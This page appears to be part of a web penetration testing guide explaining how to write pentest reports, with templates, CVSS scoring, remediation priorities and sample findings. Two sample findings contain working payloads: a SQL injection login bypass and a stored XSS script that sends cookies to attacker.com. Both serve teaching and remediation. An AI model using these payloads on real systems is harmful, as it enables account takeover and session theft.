Reporting

The report is the primary deliverable of a penetration test. A well-written report communicates findings clearly to both technical teams and executive stakeholders.

📋 Why Reporting Matters

Client Value: The report is what clients pay for - it drives remediation and justifies the engagement
Professional Reputation: Quality reports lead to repeat business and referrals
Actionable Results: Clear findings and remediation steps enable clients to fix vulnerabilities
Compliance Evidence: Reports provide audit trail for regulatory requirements

💡 Pro Tip: A mediocre test with an excellent report is more valuable than an excellent test with a poor report - if findings aren't communicated clearly, they won't get fixed.

🛠️ Reporting Tools

Dradis

Open-source collaboration framework for pentest reporting.

gem install dradis dradisframework.com →

Ghostwriter

Report management for red team engagements.

docker-compose up -d GitHub →

PlexTrac

Enterprise pentest reporting and workflow platform.

# Commercial platform plextrac.com →

Serpico

Penetration testing report generation.

docker pull serpicoproject/serpico GitHub →

PwnDoc

Pentest reporting web application.

docker-compose up -d GitHub →

CVSS Calculator

Calculate and document vulnerability severity scores.

# Web-based calculator FIRST.org →

Report Structure

Report Sections

flowchart TD A[Penetration Test Report] --> B[Executive Summary] A --> C[Methodology] A --> D[Findings] A --> E[Remediation] A --> F[Appendices] B --> B1[Risk Overview] B --> B2[Key Findings] B --> B3[Recommendations] D --> D1[Critical] D --> D2[High] D --> D3[Medium] D --> D4[Low] D --> D5[Informational] style A fill:#111,stroke:#00ff00,color:#00ff00

1. Executive Summary

A non-technical overview for management and executives. Should be understandable without security expertise.

Executive Summary Template 
EXECUTIVE SUMMARY

Engagement Overview
-------------------
[Company Name] engaged [Tester/Firm] to conduct a web application 
penetration test of [Application Name] from [Start Date] to [End Date].

Scope
-----
The assessment covered:
- Primary web application: https://app.example.com
- API endpoints: https://api.example.com
- Authentication systems
- [Other scope items]

Key Findings
------------
The assessment identified [X] vulnerabilities:
- Critical: [X]
- High: [X]  
- Medium: [X]
- Low: [X]
- Informational: [X]

Notable findings include:
1. [Critical Finding 1] - Risk of [impact]
2. [High Finding 2] - Risk of [impact]
3. [High Finding 3] - Risk of [impact]

Overall Risk Rating: [HIGH/MEDIUM/LOW]

Recommendations
---------------
Immediate actions required:
1. [Action 1]
2. [Action 2]
3. [Action 3]

Conclusion
----------
[Brief statement on overall security posture and urgency of remediation]

2. Methodology

Methodology Section 
METHODOLOGY

Testing Approach
----------------
This assessment was conducted as a [black-box/gray-box/white-box] 
penetration test, following industry-standard methodologies including:
- OWASP Testing Guide v4.2
- PTES (Penetration Testing Execution Standard)
- NIST SP 800-115

Phases
------
1. Reconnaissance
   - Passive information gathering
   - DNS enumeration
   - Technology fingerprinting

2. Scanning
   - Port scanning
   - Service enumeration
   - Vulnerability scanning

3. Exploitation
   - Manual vulnerability verification
   - Proof-of-concept development
   - Impact assessment

4. Post-Exploitation
   - Privilege escalation attempts
   - Data access verification
   - Lateral movement assessment

Tools Used
----------
- Burp Suite Professional
- Nmap
- SQLMap
- Nuclei
- [Other tools]

Limitations
-----------
- Testing was conducted during business hours only
- Denial of Service testing was excluded
- [Other limitations]

3. Detailed Findings

Each finding should follow a consistent format:

Finding Template 
FINDING: SQL Injection in Login Form
=====================================

Severity: CRITICAL
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Affected Component
------------------
URL: https://app.example.com/login
Parameter: username
Method: POST

Description
-----------
A SQL injection vulnerability was identified in the login form's 
username parameter. An attacker can inject arbitrary SQL commands 
to bypass authentication, extract database contents, or potentially 
execute system commands.

Technical Details
-----------------
The following payload was used to confirm the vulnerability:

Request:
POST /login HTTP/1.1
Host: app.example.com
Content-Type: application/x-www-form-urlencoded

username=admin'--&password=anything

Response:
HTTP/1.1 302 Found
Location: /dashboard
Set-Cookie: session=eyJ1c2VyIjoiYWRtaW4ifQ==

The application accepted the malicious input without sanitization,
resulting in successful authentication bypass.

Impact
------
- Complete authentication bypass
- Full database access (demonstrated extraction of user credentials)
- Potential server-side command execution
- Complete compromise of application and user data

Evidence
--------
[Screenshot: admin_dashboard_access.png]
[Request/Response: sqli_poc.txt]

Remediation
-----------
1. Implement parameterized queries (prepared statements)
2. Use an ORM with built-in SQL injection protection
3. Apply input validation and sanitization
4. Implement Web Application Firewall rules

Code Example (Before/After):

VULNERABLE:
$query = "SELECT * FROM users WHERE username = '" + username + "'";

SECURE:
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
$stmt->execute([$username]);

References
----------
- OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
- CWE-89: https://cwe.mitre.org/data/definitions/89.html

CVSS Scoring

The Common Vulnerability Scoring System (CVSS) provides a standardized way to rate vulnerability severity.

Score Range Severity Description
9.0 - 10.0 Critical Immediate exploitation likely, severe impact
7.0 - 8.9 High Easy to exploit, significant impact
4.0 - 6.9 Medium Moderate difficulty or impact
0.1 - 3.9 Low Difficult to exploit or minimal impact
0.0 Informational Best practice recommendations

CVSS v3.1 Vector Components

Base Metrics

  • AV (Attack Vector): Network/Adjacent/Local/Physical
  • AC (Attack Complexity): Low/High
  • PR (Privileges Required): None/Low/High
  • UI (User Interaction): None/Required
  • S (Scope): Unchanged/Changed
  • C (Confidentiality): None/Low/High
  • I (Integrity): None/Low/High
  • A (Availability): None/Low/High

Common CVSS Scores

  • Unauthenticated RCE: 9.8
  • SQL Injection: 8.6 - 9.8
  • Stored XSS: 6.1 - 8.0
  • CSRF: 4.3 - 8.0
  • Reflected XSS: 6.1
  • Missing Security Headers: 0.0 - 3.0

CVSS Calculator

Use the official NIST CVSS Calculator: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator

Remediation Guidance

Remediation Priority Matrix 
REMEDIATION PRIORITIES

Immediate (24-48 hours)
-----------------------
[ ] Finding #1: SQL Injection in Login - Implement prepared statements
[ ] Finding #2: Exposed Admin Panel - Restrict access by IP/VPN

Short-term (1-2 weeks)
----------------------
[ ] Finding #3: XSS in Search - Implement output encoding
[ ] Finding #4: Missing CSRF Tokens - Add tokens to all forms
[ ] Finding #5: Weak Password Policy - Enforce complexity requirements

Medium-term (1-3 months)
------------------------
[ ] Finding #6: Outdated Libraries - Update all dependencies
[ ] Finding #7: Missing Security Headers - Configure CSP, HSTS
[ ] Finding #8: Verbose Error Messages - Implement generic errors

Long-term (3-6 months)
----------------------
[ ] Implement WAF
[ ] Security code review process
[ ] Developer security training
[ ] Regular penetration testing schedule

Common Remediation Recommendations

Vulnerability Primary Remediation Defense in Depth
SQL Injection Parameterized queries WAF, input validation, least privilege DB
XSS Output encoding CSP headers, input validation
CSRF Anti-CSRF tokens SameSite cookies, referer validation
Auth Bypass Proper access controls MFA, session management, audit logging
File Upload Whitelist file types Separate domain, virus scanning, no execution
SSRF Input validation Network segmentation, egress filtering

Appendices

What to Include

Appendix A: Raw Data

  • • Nmap scan results
  • • Vulnerability scanner output
  • • Tool configuration files

Appendix B: Evidence

  • • Screenshots (numbered)
  • • HTTP requests/responses
  • • Proof-of-concept code

Appendix C: References

  • • OWASP resources
  • • CVE references
  • • CWE identifiers

Appendix D: Glossary

  • • Technical terms defined
  • • Acronyms explained
  • • CVSS methodology

Report Delivery

Secure Delivery Checklist 
REPORT DELIVERY CHECKLIST

Before Delivery
---------------
[ ] Spell check and grammar review
[ ] Technical accuracy verification
[ ] Screenshot quality check
[ ] CVSS scores validated
[ ] Sensitive data redacted appropriately
[ ] PDF generated with restricted permissions

Secure Transmission
-------------------
[ ] Encrypt report (GPG/PGP or password-protected PDF)
[ ] Use secure file transfer (encrypted portal, SFTP)
[ ] Send password via separate channel
[ ] Confirm recipient authorized to receive

After Delivery
--------------
[ ] Schedule findings walkthrough meeting
[ ] Offer Q&A session with technical team
[ ] Discuss remediation priorities
[ ] Set retest date if applicable
[ ] Archive engagement files securely

Sample Finding Write-ups

Sample: Stored XSS Finding 
FINDING: Stored Cross-Site Scripting in User Comments
=====================================================

Severity: HIGH
CVSS Score: 8.0
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

Affected Component
------------------
URL: https://app.example.com/posts/[id]/comments
Parameter: comment_body (POST)

Description
-----------
User-submitted comments are stored in the database and rendered 
without proper output encoding, allowing attackers to inject 
malicious JavaScript that executes in other users' browsers.

Technical Details
-----------------
Payload submitted:
<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

When another user views the page containing this comment, the 
script executes and sends their session cookie to the attacker.

Impact
------
- Session hijacking of any user viewing the malicious comment
- Account takeover
- Malware distribution
- Defacement

Evidence
--------
[Screenshot: xss_payload_stored.png]
[Screenshot: cookie_received_attacker_server.png]

Remediation
-----------
1. Implement output encoding for all user-generated content
2. Use Content Security Policy (CSP) headers
3. Set HttpOnly flag on session cookies
4. Consider using a HTML sanitization library

Example Fix:
// Instead of:
element.innerHTML = userComment;

// Use:
element.textContent = userComment;
// Or with HTML allowed:
element.innerHTML = DOMPurify.sanitize(userComment);

Report Quality

A penetration test report should be understandable by both technical staff who will fix the issues and executives who will approve the budget. Balance technical detail with clear business impact statements.

📖 Report Templates & Resources

Public Pentest Reports

Collection of real-world pentest reports for reference

OSCP Report Templates

Offensive Security sample report formats

CVSS 3.1 Calculator

Official FIRST CVSS scoring calculator

CWE Database

Common Weakness Enumeration for consistent categorization

🎉 Web Pentest Guide Complete!

You've completed the comprehensive Web Penetration Testing guide. Consider exploring the Internal Penetration Testing guide or check out the Tool Cheatsheets for quick reference materials.

Related Topics

Post-Exploitation

Evidence collection and impact assessment

Report Templates

Ready-to-use pentest report templates

Remediation Guidance

Fix recommendations for common vulnerabilities

Tools Reference

Complete tools listing